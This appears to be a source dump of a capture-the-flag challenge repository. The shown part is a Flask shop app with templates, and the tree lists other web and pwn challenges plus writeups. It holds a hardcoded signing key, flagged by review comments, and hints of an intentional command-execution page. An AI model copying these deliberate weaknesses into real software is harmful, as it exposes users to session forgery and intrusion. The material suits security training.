├── Flaskshop ├── run.py ├── taobao │ ├── __init__.py │ ├── forms.py │ ├── models.py │ ├── routes.py │ ├── static │ │ ├── bootstrap.min.css │ │ ├── bootstrap.min.js │ │ ├── jquery-3.2.1.slim.min.js │ │ ├── main.css │ │ └── popper.min.js │ ├── taobaotest.db │ └── templates │ │ ├── account_about.html │ │ ├── account_layout.html │ │ ├── before_find_password.html │ │ ├── completed_orders.html │ │ ├── coustomer_detail_manager.html │ │ ├── crew_account.html │ │ ├── crew_market.html │ │ ├── crew_order_manager.html │ │ ├── customer_account.html │ │ ├── customer_check_supplier_products.html │ │ ├── customer_order_manager.html │ │ ├── home.html │ │ ├── layout.html │ │ ├── login.html │ │ ├── new_customer_detail.html │ │ ├── register.html │ │ ├── reset_request.html │ │ ├── reset_token.html │ │ ├── search.html │ │ ├── security_check.html │ │ ├── shopping_car.html │ │ ├── shou_supplier_crews.html │ │ ├── show_confirm_waitting_orders.html │ │ ├── show_customer_detail.html │ │ ├── show_order_details.html │ │ ├── show_supplier_product.html │ │ ├── supplier_account.html │ │ ├── supplier_add_product_count.html │ │ ├── supplier_crew_manager.html │ │ ├── supplier_new_product.html │ │ ├── supplier_product_manager.html │ │ ├── supplier_update_product.html │ │ ├── traning_orders.html │ │ ├── update_crew_info.html │ │ ├── update_customer_detail.html │ │ ├── update_info.html │ │ ├── update_password.html │ │ ├── update_supplier_info.html │ │ ├── upload.html │ │ └── waitting_orders.html └── writeup.pdf ├── LICENSE ├── README.md ├── easyWEB ├── docker-compose.yml ├── web1 │ ├── Dockerfile │ └── html │ │ ├── common │ │ ├── cacf.php │ │ ├── function.php │ │ └── home.php │ │ ├── geez.sql │ │ ├── include │ │ ├── config.php │ │ ├── log1.php │ │ └── shell.php │ │ ├── index.php │ │ ├── lib │ │ ├── File.php │ │ ├── User.php │ │ ├── base.php │ │ └── run.php │ │ ├── log.php │ │ ├── org │ │ └── smarty │ │ │ ├── Autofoucer.php │ │ │ ├── Autoloader.php │ │ │ ├── Smarty.class.php │ │ │ ├── 
SmartyBC.class.php │ │ │ ├── debug.tpl │ │ │ ├── plugins │ │ │ ├── block.textformat.php │ │ │ ├── function.counter.php │ │ │ ├── function.cycle.php │ │ │ ├── function.fetch.php │ │ │ ├── function.html_checkboxes.php │ │ │ ├── function.html_image.php │ │ │ ├── function.html_options.php │ │ │ ├── function.html_radios.php │ │ │ ├── function.html_select_date.php │ │ │ ├── function.html_select_time.php │ │ │ ├── function.html_table.php │ │ │ ├── function.mailto.php │ │ │ ├── function.math.php │ │ │ ├── modifier.capitalize.php │ │ │ ├── modifier.date_format.php │ │ │ ├── modifier.debug_print_var.php │ │ │ ├── modifier.escape.php │ │ │ ├── modifier.regex_replace.php │ │ │ ├── modifier.replace.php │ │ │ ├── modifier.spacify.php │ │ │ ├── modifier.truncate.php │ │ │ ├── modifiercompiler.cat.php │ │ │ ├── modifiercompiler.count_characters.php │ │ │ ├── modifiercompiler.count_paragraphs.php │ │ │ ├── modifiercompiler.count_sentences.php │ │ │ ├── modifiercompiler.count_words.php │ │ │ ├── modifiercompiler.default.php │ │ │ ├── modifiercompiler.escape.php │ │ │ ├── modifiercompiler.from_charset.php │ │ │ ├── modifiercompiler.indent.php │ │ │ ├── modifiercompiler.lower.php │ │ │ ├── modifiercompiler.noprint.php │ │ │ ├── modifiercompiler.string_format.php │ │ │ ├── modifiercompiler.strip.php │ │ │ ├── modifiercompiler.strip_tags.php │ │ │ ├── modifiercompiler.to_charset.php │ │ │ ├── modifiercompiler.unescape.php │ │ │ ├── modifiercompiler.upper.php │ │ │ ├── modifiercompiler.wordwrap.php │ │ │ ├── outputfilter.trimwhitespace.php │ │ │ ├── shared.escape_special_chars.php │ │ │ ├── shared.literal_compiler_param.php │ │ │ ├── shared.make_timestamp.php │ │ │ ├── shared.mb_str_replace.php │ │ │ ├── shared.mb_unicode.php │ │ │ ├── shared.mb_wordwrap.php │ │ │ └── variablefilter.htmlspecialchars.php │ │ │ └── sysplugins │ │ │ ├── smarty_cacheresource.php │ │ │ ├── smarty_cacheresource_custom.php │ │ │ ├── smarty_cacheresource_keyvaluestore.php │ │ │ ├── smarty_data.php │ │ │ ├── 
smarty_internal_cacheresource_file.php │ │ │ ├── smarty_internal_compile_append.php │ │ │ ├── smarty_internal_compile_assign.php │ │ │ ├── smarty_internal_compile_block.php │ │ │ ├── smarty_internal_compile_break.php │ │ │ ├── smarty_internal_compile_call.php │ │ │ ├── smarty_internal_compile_capture.php │ │ │ ├── smarty_internal_compile_config_load.php │ │ │ ├── smarty_internal_compile_continue.php │ │ │ ├── smarty_internal_compile_debug.php │ │ │ ├── smarty_internal_compile_eval.php │ │ │ ├── smarty_internal_compile_extends.php │ │ │ ├── smarty_internal_compile_for.php │ │ │ ├── smarty_internal_compile_foreach.php │ │ │ ├── smarty_internal_compile_function.php │ │ │ ├── smarty_internal_compile_if.php │ │ │ ├── smarty_internal_compile_include.php │ │ │ ├── smarty_internal_compile_include_php.php │ │ │ ├── smarty_internal_compile_insert.php │ │ │ ├── smarty_internal_compile_ldelim.php │ │ │ ├── smarty_internal_compile_nocache.php │ │ │ ├── smarty_internal_compile_private_block_plugin.php │ │ │ ├── smarty_internal_compile_private_function_plugin.php │ │ │ ├── smarty_internal_compile_private_modifier.php │ │ │ ├── smarty_internal_compile_private_object_block_function.php │ │ │ ├── smarty_internal_compile_private_object_function.php │ │ │ ├── smarty_internal_compile_private_php.php │ │ │ ├── smarty_internal_compile_private_print_expression.php │ │ │ ├── smarty_internal_compile_private_registered_block.php │ │ │ ├── smarty_internal_compile_private_registered_function.php │ │ │ ├── smarty_internal_compile_private_special_variable.php │ │ │ ├── smarty_internal_compile_rdelim.php │ │ │ ├── smarty_internal_compile_section.php │ │ │ ├── smarty_internal_compile_setfilter.php │ │ │ ├── smarty_internal_compile_while.php │ │ │ ├── smarty_internal_compilebase.php │ │ │ ├── smarty_internal_config_file_compiler.php │ │ │ ├── smarty_internal_configfilelexer.php │ │ │ ├── smarty_internal_configfileparser.php │ │ │ ├── smarty_internal_data.php │ │ │ ├── smarty_internal_debug.php │ │ 
│ ├── smarty_internal_extension_codeframe.php │ │ │ ├── smarty_internal_extension_config.php │ │ │ ├── smarty_internal_extension_defaulttemplatehandler.php │ │ │ ├── smarty_internal_filter_handler.php │ │ │ ├── smarty_internal_function_call_handler.php │ │ │ ├── smarty_internal_get_include_path.php │ │ │ ├── smarty_internal_nocache_insert.php │ │ │ ├── smarty_internal_parsetree.php │ │ │ ├── smarty_internal_parsetree_code.php │ │ │ ├── smarty_internal_parsetree_dq.php │ │ │ ├── smarty_internal_parsetree_dqcontent.php │ │ │ ├── smarty_internal_parsetree_tag.php │ │ │ ├── smarty_internal_parsetree_template.php │ │ │ ├── smarty_internal_parsetree_text.php │ │ │ ├── smarty_internal_resource_eval.php │ │ │ ├── smarty_internal_resource_extends.php │ │ │ ├── smarty_internal_resource_file.php │ │ │ ├── smarty_internal_resource_php.php │ │ │ ├── smarty_internal_resource_registered.php │ │ │ ├── smarty_internal_resource_stream.php │ │ │ ├── smarty_internal_resource_string.php │ │ │ ├── smarty_internal_smartytemplatecompiler.php │ │ │ ├── smarty_internal_template.php │ │ │ ├── smarty_internal_templatebase.php │ │ │ ├── smarty_internal_templatecompilerbase.php │ │ │ ├── smarty_internal_templatelexer.php │ │ │ ├── smarty_internal_templateparser.php │ │ │ ├── smarty_internal_testinstall.php │ │ │ ├── smarty_internal_utility.php │ │ │ ├── smarty_internal_write_file.php │ │ │ ├── smarty_resource.php │ │ │ ├── smarty_resource_custom.php │ │ │ ├── smarty_resource_recompiled.php │ │ │ ├── smarty_resource_uncompiled.php │ │ │ ├── smarty_security.php │ │ │ ├── smarty_template_cached.php │ │ │ ├── smarty_template_compiled.php │ │ │ ├── smarty_template_config.php │ │ │ ├── smarty_template_source.php │ │ │ ├── smarty_undefined_variable.php │ │ │ ├── smarty_variable.php │ │ │ ├── smartycompilerexception.php │ │ │ └── smartyexception.php │ │ ├── public │ │ ├── css │ │ │ ├── bootstrap-theme.css │ │ │ ├── bootstrap-theme.css.map │ │ │ ├── bootstrap-theme.min.css │ │ │ ├── bootstrap.css │ │ │ 
├── bootstrap.css.map │ │ │ ├── bootstrap.min.css │ │ │ ├── gongyong.css │ │ │ ├── reset.css │ │ │ └── style.css │ │ ├── image │ │ │ ├── background.jpg │ │ │ ├── bg.jpg │ │ │ ├── big.jpg │ │ │ ├── name.png │ │ │ └── password.png │ │ └── js │ │ │ ├── app.js │ │ │ ├── bootstrap.js │ │ │ ├── bootstrap.min.js │ │ │ ├── jquery-1.8.3.min.js │ │ │ ├── jquery.min.js │ │ │ ├── npm.js │ │ │ └── particles.min.js │ │ ├── supervisord.conf │ │ └── templates │ │ ├── error.tpl │ │ ├── home.tpl │ │ ├── index.tpl │ │ ├── register.tpl │ │ ├── success.tpl │ │ └── updatepass.tpl └── writeup.pdf ├── pwn ├── calculator ├── calculator.bak └── writeup.py └── thinkPHP ├── .gitignore ├── LICENSE.txt ├── application ├── .htaccess ├── admin │ ├── config.php │ ├── controller │ │ ├── Admin.php │ │ ├── Article.php │ │ ├── Base.php │ │ ├── Cate.php │ │ ├── Index.php │ │ ├── Links.php │ │ └── Login.php │ ├── model │ │ ├── Admin.php │ │ ├── Article.php │ │ ├── Cate.php │ │ └── Links.php │ ├── validate │ │ ├── Admin.php │ │ ├── Article.php │ │ ├── Cate.php │ │ ├── Links.php │ │ └── Tags.php │ └── view │ │ ├── admin │ │ ├── add.htm │ │ ├── edit.htm │ │ └── lst.htm │ │ ├── article │ │ ├── add.htm │ │ ├── edit.htm │ │ └── lst.htm │ │ ├── cate │ │ ├── add.htm │ │ ├── edit.htm │ │ └── lst.htm │ │ ├── common │ │ ├── left.htm │ │ └── top.htm │ │ ├── index │ │ └── index.htm │ │ ├── links │ │ ├── add.htm │ │ ├── edit.htm │ │ └── lst.htm │ │ └── login │ │ └── login.htm ├── command.php ├── common.php ├── config.php ├── database.php ├── index │ ├── common.php │ ├── config.php │ ├── controller │ │ ├── Article.php │ │ ├── Base.php │ │ ├── Cate.php │ │ ├── Index.php │ │ └── Search.php │ └── view │ │ ├── article │ │ └── article.html │ │ ├── cate │ │ └── cate.html │ │ ├── common │ │ ├── foot.html │ │ ├── header.html │ │ └── right.html │ │ ├── index │ │ └── index.html │ │ └── search │ │ └── search.html ├── route.php └── tags.php ├── blog.sql ├── build.php ├── composer.json ├── extend └── .gitignore ├── phpunit.xml ├── 
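public ├── .htaccess ├── blog.sql ├── favicon.ico ├── index.php ├── robots.txt ├── router.php └── static │ └── .gitignore ├── runtime └── temp │ ├── 3f3091e7a346cc474820a2a4d5d14333.php │ ├── 549f8e214256acc77c6d71d90dde481a.php │ ├── 5944f8a212d3e204c557b2fecd7b261a.php │ ├── 6073676e7ea783822304d5de1e2c1312.php │ ├── 7729e0943396e8a1340f5e4073f07a18.php │ ├── c0edf44dce95ffc9c1d548d9364e8dc9.php │ ├── deeca46088bab20aa254dff5b1dd2fe5.php │ └── e71583a3903d6016ef1ca6d413119863.php ├── tests ├── ExampleTest.php └── TestCase.php ├── think ├── vendor └── .gitignore └── writeup.pdf

/Flaskshop/run.py:
--------------------------------------------------------------------------------
# -*- coding: utf-8 -*-
"""Entry point: wrap the Flask app in ProxyFix and start the server when run as a script."""
from taobao import app,db
from werkzeug.contrib.fixers import ProxyFix

# ProxyFix rewrites the WSGI environ from X-Forwarded-* request headers.
# NOTE(review): this is only sound when every request arrives through a
# reverse proxy that sets those headers itself; if the app is reachable
# directly, the client controls them and the remote address / scheme seen
# by the app can be spoofed.
# NOTE(review): `werkzeug.contrib` was removed in Werkzeug 1.0; the class now
# lives in `werkzeug.middleware.proxy_fix` with different defaults, so this
# import pins the project to an old Werkzeug release.
app.wsgi_app=ProxyFix(app.wsgi_app)


if __name__ == '__main__':
    # The original called db.create_all() after app.run(). app.run() blocks
    # until the server stops, so the tables were only created at shutdown.
    # Create them first, inside an application context.
    # NOTE(review): the listing lost its indentation; if create_all() was
    # meant to run at import time (WSGI deployment), move it above this guard.
    with app.app_context():
        db.create_all()
    app.run(debug=False)

--------------------------------------------------------------------------------
/Flaskshop/taobao/__init__.py:
--------------------------------------------------------------------------------
# -*- coding: utf-8 -*-
"""Package setup: create the Flask app and bind the database, bcrypt and login extensions."""
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask_bcrypt import Bcrypt
from flask_login import LoginManager
from flask_mail import Mail

app = Flask(__name__)
# SQLite file database; check_same_thread=False turns off sqlite3's
# same-thread guard on the connection.
app.config["SQLALCHEMY_DATABASE_URI"] = r"sqlite:///taobaotest.db?check_same_thread=False"
# NOTE(review): this signing key is committed to the repository, so it cannot
# be treated as secret. Everything signed with it (Flask session cookies, and
# presumably the password-reset tokens; routes.py is not shown) has to be
# considered forgeable. Any real deployment must load a random key from the
# environment or a secret store and rotate this one.
app.config['SECRET_KEY'] = '5791628bb0b13ce0c576dfde280ba255'
# Enables Flask-SQLAlchemy's modification-tracking signals, which add overhead;
# the Flask-SQLAlchemy documentation recommends turning this off when unused.
app.config["SQLALCHEMY_TRACK_MODIFICATIONS"]=True


db = SQLAlchemy(app)
bcrypt = Bcrypt(app)
login_manager = LoginManager(app)
# Endpoint name that unauthenticated users are redirected to.
login_manager.login_view = "login"
# Flash-message category used for the "please log in" notice.
login_manager.login_message_category ="info"


# Imported last, presumably because routes.py imports `app` from this package
# and would otherwise hit a circular import. Confirm against routes.py.
from taobao import routes

--------------------------------------------------------------------------------
/Flaskshop/taobao/static/main.css: 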
-------------------------------------------------------------------------------- 1 | body { 2 | background: #fafafa; 3 | color: #333333; 4 | margin-top: 5rem; 5 | } 6 | 7 | h1, h2, h3, h4, h5, h6 { 8 | color: #444444; 9 | } 10 | 11 | .bg-steel { 12 | background-color: #5f788a; 13 | } 14 | 15 | .site-header .navbar-nav .nav-link { 16 | color: #cbd5db; 17 | } 18 | 19 | .site-header .navbar-nav .nav-link:hover { 20 | color: #ffffff; 21 | } 22 | 23 | .site-header .navbar-nav .nav-link.active { 24 | font-weight: 500; 25 | } 26 | 27 | .content-section { 28 | background: #ffffff; 29 | padding: 10px 20px; 30 | border: 1px solid #dddddd; 31 | border-radius: 3px; 32 | margin-bottom: 20px; 33 | } 34 | 35 | .article-title { 36 | color: #444444; 37 | } 38 | 39 | a.article-title:hover { 40 | color: #428bca; 41 | text-decoration: none; 42 | } 43 | 44 | .article-content { 45 | white-space: pre-line; 46 | } 47 | 48 | .article-img { 49 | height: 65px; 50 | width: 65px; 51 | margin-right: 16px; 52 | } 53 | 54 | .article-metadata { 55 | padding-bottom: 1px; 56 | margin-bottom: 4px; 57 | border-bottom: 1px solid #e3e3e3 58 | } 59 | 60 | .article-metadata a:hover { 61 | color: #333; 62 | text-decoration: none; 63 | } 64 | 65 | .article-svg { 66 | width: 25px; 67 | height: 25px; 68 | vertical-align: middle; 69 | } 70 | 71 | .account-img { 72 | height: 125px; 73 | width: 125px; 74 | margin-right: 20px; 75 | margin-bottom: 16px; 76 | } 77 | 78 | .account-heading { 79 | font-size: 2.5rem; 80 | } 81 | -------------------------------------------------------------------------------- /Flaskshop/taobao/taobaotest.db: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GinkgoTeam/YJTZB_2019/7acb23f145ff70e09baade92e6b5a65856b36a1e/Flaskshop/taobao/taobaotest.db -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/account_about.html: 
-------------------------------------------------------------------------------- 1 | {% extends "account_layout.html" %} 2 | {% block info %} 3 |

About page


4 | 5 | {% endblock info %} 6 | -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/account_layout.html: -------------------------------------------------------------------------------- 1 | {% extends "layout.html" %} 2 | {% block content %} 3 |
4 |
5 |
6 | 7 |

{{ current_user.email }}

8 |
9 |
10 | {% block info %}{% endblock info %} 11 |
12 | 13 | {% endblock content %} 14 | -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/before_find_password.html: -------------------------------------------------------------------------------- 1 | {% extends "layout.html" %} 2 | {% block content %} 3 |
4 |
5 | {{ form.hidden_tag() }} 6 |
7 | 找回密码 8 |
9 | {{ form.role.label(class="form-control-label") }} 10 | 11 | {% if form.role.errors %} 12 | {{ form.role(class="form-control form-control-lg is-invalid") }} 13 |
14 | {% for error in form.role.errors %} 15 | {{ error }} 16 | {% endfor %} 17 |
18 | {% else %} 19 | {{ form.role(class="form-control form-control-lg") }} 20 | {% endif %} 21 |
22 |
23 | {{ form.email.label(class="form-control-label") }} 24 | 25 | {% if form.email.errors %} 26 | {{ form.email(class="form-control form-control-lg is-invalid") }} 27 |
28 | {% for error in form.email.errors %} 29 | {{ error }} 30 | {% endfor %} 31 |
32 | {% else %} 33 | {{ form.email(class="form-control form-control-lg") }} 34 | {% endif %} 35 |
36 |
37 | {{ form.confirm.label(class="form-control-label") }} 38 | 39 | {% if form.confirm.errors %} 40 | {{ form.confirm(class="form-control form-control-lg is-invalid") }} 41 |
42 | {% for error in form.confirm.errors %} 43 | {{ error }} 44 | {% endfor %} 45 |
46 | {% else %} 47 | {{ form.confirm(class="form-control form-control-lg") }} 48 | {% endif %} 49 |
50 | 51 |
52 |
53 | {{ form.submit(class="btn btn-outline-info") }} 54 |
55 |
56 | 57 |
58 | {% endblock content %} 59 | -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/completed_orders.html: -------------------------------------------------------------------------------- 1 | {% extends "account_layout.html" %} 2 | {% block info %} 3 |

收货成功,交易完成的订单


4 | {% if orders %} 5 | {% for order in orders %} 6 |
7 | 订单编号:{{ order.id}}
8 | 下单时间:{{ order.start_time}}
完成时间:{{ order.end_time}}
9 | 订单价格:{{ order.total_price }}
10 | 订单的状态:收货成功,交易完成
11 | 订单详情 12 | 13 |
14 | {% endfor %} 15 | {% else %} 16 | 空空如也,什么也没有哦。 17 | {% endif %} 18 | 19 | {% endblock info %} 20 | -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/coustomer_detail_manager.html: -------------------------------------------------------------------------------- 1 | {% extends "account_layout.html" %} 2 | {% block info %} 3 |

收货地址管理


4 | 添加我的收货地址
5 | 查看我的收货地址
6 | {% endblock info %} 7 | -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/crew_account.html: -------------------------------------------------------------------------------- 1 | {% extends "account_layout.html" %} 2 | {% block info %} 3 | {% if crew.is_employ !=0 %} 4 | 我的老板:{{ supplier.supplier_name }}
5 | {% if supplier.mission !="作为老板的你,今天还没有给员工分配任务" %} 6 |
今日任务:
7 |
{{ supplier.mission }}
8 | {% else %} 9 | 今日任务:老板今天没有布置什么特别哦
10 | {% endif %}
11 | 完成顾客的订单
12 | {% else %} 13 | 不好意思,目前为止你还没有被老板雇佣呢!
14 | {% endif %} 15 | 管理我的基本信息
16 | 完善我的求职信息
17 | {% endblock info %} 18 | -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/crew_market.html: -------------------------------------------------------------------------------- 1 | {% extends "layout.html" %} 2 | {% block content %} 3 |
4 |

人才市场

5 |
6 |
7 | {% if crews%} 8 | {% for crew in crews %} 9 |
10 |
11 | 求职人:{{ crew.crew_name }}
12 | 求职宣言:{{crew.massage }}
13 |
14 | {% if current_user.table_name =="Supplier" %} 15 |
我想录用他 16 | {% endif %} 17 | 18 |
19 | 20 | {% endfor %} 21 | {% else %} 22 |
23 |

今天的人才都被老板带走了 下次早点过来吧!

24 |
25 | {% endif %} 26 | 27 |
28 | 29 | 30 | 31 | {% endblock content %} 32 | -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/crew_order_manager.html: -------------------------------------------------------------------------------- 1 | {% extends "account_layout.html" %} 2 | {% block info %} 3 |

雇员订单管理


4 | 需要确认发货的订单

5 | {% endblock info %} 6 | -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/customer_account.html: -------------------------------------------------------------------------------- 1 | {% extends "account_layout.html" %} 2 | {% block info %} 3 | 管理我的收货地址
4 | 管理我的订单
5 | 管理我的基本信息
6 | 7 | {% endblock info %} 8 | -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/customer_check_supplier_products.html: -------------------------------------------------------------------------------- 1 | {% extends "layout.html" %} 2 | {% block content %} 3 | 4 |
5 |

{{ supplier.supplier_name }}


6 | 电话:{{ supplier.telephone }}
7 | 地址:{{ supplier.address }}
8 |
9 | {% if products %} 10 | {% for product in products %} 11 |
12 | 13 | 商品名称:{{ product.name }}
14 | 商品类别:{{ product.sort }}
15 | 商品价格:{{ product.price }}
16 | 商品细节:{{ product.detail }}
17 | 商品剩余库存量:{{ product.product_count }}
18 | {% if current_user.table_name =="Customer" %} 19 | 我想购买它 20 | {% endif %} 21 |
22 |
23 | {% endfor %} 24 | {% endif %} 25 | 26 | {% endblock %} 27 | -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/customer_order_manager.html: -------------------------------------------------------------------------------- 1 | {% extends "account_layout.html" %} 2 | {% block info %} 3 |

我的订单管理


4 | 等待发货的订单

5 | 等待确认收货的订单

6 | 完成交易的订单

7 | {% endblock info %} 8 | -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/home.html: -------------------------------------------------------------------------------- 1 | {% extends "layout.html" %} 2 | {% block content %} 3 |
4 |

商品市场

5 |
6 |
7 | {% if products %} 8 | {% for product in products %} 9 | {% if product.product_count !=0 %} 10 |
11 | 商家名称:{{ product.supplier.first().supplier_name}}
12 | 商品名称:{{ product.name }}
13 | 商品类别:{{ product.sort }}
14 | 商品价格:{{ product.price }}
15 | 商品细节:{{ product.detail }}
16 | 商品剩余库存量:{{ product.product_count }}
17 | 18 | {% if current_user.table_name =="Customer" %} 19 |
我想购买它 20 | {% endif %} 21 |
22 | {% endif %} 23 | 24 | 25 | 26 | 27 | {% endfor %} 28 | {% else %} 29 |
30 |

今天的商品都被买走了 下次早点过来吧!

31 |
32 | {% endif %} 33 | 34 |
35 | 36 | 37 | 38 | {% endblock content %} 39 | -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/new_customer_detail.html: -------------------------------------------------------------------------------- 1 | {% extends "layout.html" %} 2 | {% block content %} 3 |
4 |
5 | {{ form.hidden_tag() }} 6 |
7 | 添加收获地址 8 |
9 | {{ form.consignee.label(class="form-control-label") }} 10 | 11 | {% if form.consignee.errors %} 12 | {{ form.consignee(class="form-control form-control-lg is-invalid") }} 13 |
14 | {% for error in form.consignee.errors %} 15 | {{ error }} 16 | {% endfor %} 17 |
18 | {% else %} 19 | {{ form.consignee(class="form-control form-control-lg") }} 20 | {% endif %} 21 |
22 |
23 | {{ form.address.label(class="form-control-label") }} 24 | 25 | {% if form.address.errors %} 26 | {{ form.address(class="form-control form-control-lg is-invalid") }} 27 |
28 | {% for error in form.address.errors %} 29 | {{ error }} 30 | {% endfor %} 31 |
32 | {% else %} 33 | {{ form.address(class="form-control form-control-lg") }} 34 | {% endif %} 35 |
36 |
37 | {{ form.telephone.label(class="form-control-label") }} 38 | {% if form.telephone.errors %} 39 | {{ form.telephone(class="form-control form-control-lg is-invalid") }} 40 |
41 | {% for error in form.telephone.errors %} 42 | {{ error }} 43 | {% endfor %} 44 |
45 | {% else %} 46 | {{ form.telephone(class="form-control form-control-lg") }} 47 | {% endif %} 48 |
49 |
50 |
51 | {{ form.submit(class="btn btn-outline-info") }} 52 |
53 |
54 |
55 | {% endblock content %} 56 | -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/reset_request.html: -------------------------------------------------------------------------------- 1 | {% extends "layout.html" %} 2 | {% block content %} 3 |
4 |
5 | {{ form.hidden_tag() }} 6 |
7 | Reset Password 8 |
9 | {{ form.role.label(class="form-control-label") }} 10 | {% if form.role.errors %} 11 | {{ form.role(class="form-control form-control-lg is-invalid") }} 12 |
13 | {% for error in form.role.errors %} 14 | {{ error }} 15 | {% endfor %} 16 |
17 | {% else %} 18 | {{ form.role(class="form-control form-control-lg") }} 19 | {% endif %} 20 |
21 |
22 | {{ form.email.label(class="form-control-label") }} 23 | {% if form.email.errors %} 24 | {{ form.email(class="form-control form-control-lg is-invalid") }} 25 |
26 | {% for error in form.email.errors %} 27 | {{ error }} 28 | {% endfor %} 29 |
30 | {% else %} 31 | {{ form.email(class="form-control form-control-lg") }} 32 | {% endif %} 33 |
34 |
35 |
36 | {{ form.submit(class="btn btn-outline-info") }} 37 |
38 |
39 |
40 | {% endblock content %} 41 | -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/reset_token.html: -------------------------------------------------------------------------------- 1 | {% extends "layout.html" %} 2 | {% block content %} 3 |
4 |
5 | {{ form.hidden_tag() }} 6 |
7 | Reset Password 8 |
9 | {{ form.password.label(class="form-control-label") }} 10 | {% if form.password.errors %} 11 | {{ form.password(class="form-control form-control-lg is-invalid") }} 12 |
13 | {% for error in form.password.errors %} 14 | {{ error }} 15 | {% endfor %} 16 |
17 | {% else %} 18 | {{ form.password(class="form-control form-control-lg") }} 19 | {% endif %} 20 |
21 |
22 | {{ form.confirm_password.label(class="form-control-label") }} 23 | {% if form.confirm_password.errors %} 24 | {{ form.confirm_password(class="form-control form-control-lg is-invalid") }} 25 |
26 | {% for error in form.confirm_password.errors %} 27 | {{ error }} 28 | {% endfor %} 29 |
30 | {% else %} 31 | {{ form.confirm_password(class="form-control form-control-lg") }} 32 | {% endif %} 33 |
34 |
35 |
36 | {{ form.submit(class="btn btn-outline-info") }} 37 |
38 |
39 |
40 | {% endblock content %} 41 | -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/search.html: -------------------------------------------------------------------------------- 1 | {% extends "layout.html" %} 2 | {% block content %} 3 | 4 | 5 | 6 | 7 | upload 8 | 9 | 10 |

执行结果

11 | {{ msg }} 12 | 13 | 14 | 15 | {% endblock content %} 16 | -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/security_check.html: -------------------------------------------------------------------------------- 1 | {% extends "layout.html" %} 2 | {% block content %} 3 |
4 |
5 | {{ form.hidden_tag() }} 6 |
7 | 身份验证 8 |
9 | {{ form.password.label(class="form-control-label") }} 10 | {% if form.password.errors %} 11 | {{ form.password(class="form-control form-control-lg is-invalid") }} 12 |
13 | {% for error in form.password.errors %} 14 | {{ error }} 15 | {% endfor %} 16 |
17 | {% else %} 18 | {{ form.password(class="form-control form-control-lg") }} 19 | {% endif %} 20 |
21 | 22 |
23 |
24 | {{ form.submit(class="btn btn-outline-info") }} 25 |
26 | 27 |
28 | 29 |
30 | 31 | {% endblock content %} 32 | -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/shopping_car.html: -------------------------------------------------------------------------------- 1 | {% extends "layout.html" %} 2 | {% block content %} 3 |
4 |

我的购物车


5 |
6 | {% if orderdetails %} 7 |
8 | {% if customer_detail_default %} 9 | 已经设置了默认地址 查看
10 | {% else %} 11 | 尚未设置默认地址 前往设置
12 | {% endif %} 13 | 14 | 15 | 已经付款,确认下单    总价格:{{ shopping_car.total_price }} 16 |
17 |
18 | {% for detail in orderdetails %} 19 |
20 |
21 | 22 | 商家:{{ detail.product.supplier.first().supplier_name}}
23 | 商品:{{ detail.product.name }}
24 | 价格:{{ detail.product.price }}
25 | 订购数量:{{ detail.product_count}}
26 | 剩余库存量:{{ detail.product.product_count }}

27 |
28 | 移出购物车     29 | 增加 10个     30 | 增加 1个      31 | 减少 1个      32 | 减少 10个     33 |
34 |
35 | {% endfor %} 36 | {% else %} 37 |
38 | 你的购物车空空如也!不如去商品市场采购一波? 39 |
40 | {% endif %} 41 | {% endblock %} 42 | -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/shou_supplier_crews.html: -------------------------------------------------------------------------------- 1 | {% extends "account_layout.html" %} 2 | {% block info %} 3 |

我的雇员列表


4 | {% if crews %} 5 | {% for crew in crews %} 6 |
7 | 8 | 雇员名称:{{ crew.crew_name }}
9 | 地址:{{ crew.address }}
10 | 电话:{{ crew.telephone }}
11 | 12 | 解雇员工 13 |
14 | 15 |
16 | {% endfor %} 17 | {% else %} 18 | 没有人哦 人才市场看看吧 19 | {% endif %} 20 | 21 | {% endblock info %} 22 | -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/show_confirm_waitting_orders.html: -------------------------------------------------------------------------------- 1 | {% extends "account_layout.html" %} 2 | {% block info %} 3 |

需要确认发货的订单


4 | {% if orders %} 5 | {% for order in orders %} 6 |
7 | 订单编号:{{ order.id}}
8 | 下单时间:{{ order.start_time}}
9 | 订单价格:{{ order.total_price }}
10 | 订单的状态:等待确认发货
11 | 订单详情 12 | 13 |
14 | {% endfor %} 15 | {% else %} 16 | 空空如也,什么也没有哦。 17 | {% endif %} 18 | 19 | {% endblock info %} 20 | -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/show_customer_detail.html: -------------------------------------------------------------------------------- 1 | {% extends "account_layout.html" %} 2 | {% block info %} 3 |

我的收货地址


4 | {% if details %} 5 | 继续 添加地址 6 | {% for detail in details %} 7 |
8 | ----------------------------------------------
9 | {% if detail.is_default == 1%} 10 | 这是你的默认地址

11 | {% else %} 12 | 设置为默认地址

13 | {% endif %} 14 | 收货人:{{ detail.consignee }}
15 | 地址:{{ detail.address }}
16 | 电话:{{ detail.telephone }} 17 | 18 | 修改地址 19 | 删除地址 20 | 21 |
22 | ----------------------------------------------
23 |
24 |
25 |
26 | {% endfor %} 27 | {% else %} 28 | 尚未添加任何收货地址 -> 添加地址 29 | {% endif %} 30 | 31 | {% endblock info %} 32 | -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/show_order_details.html: -------------------------------------------------------------------------------- 1 | {% extends "layout.html" %} 2 | {% block content %} 3 |
4 |

订单详情


5 | 总价格 :{{ order.total_price }}
6 | 订单编号:{{order_address.order_id }}
7 | 收货人:{{ order_address.consignee }}
8 | 电话:{{ order_address.telephone }}
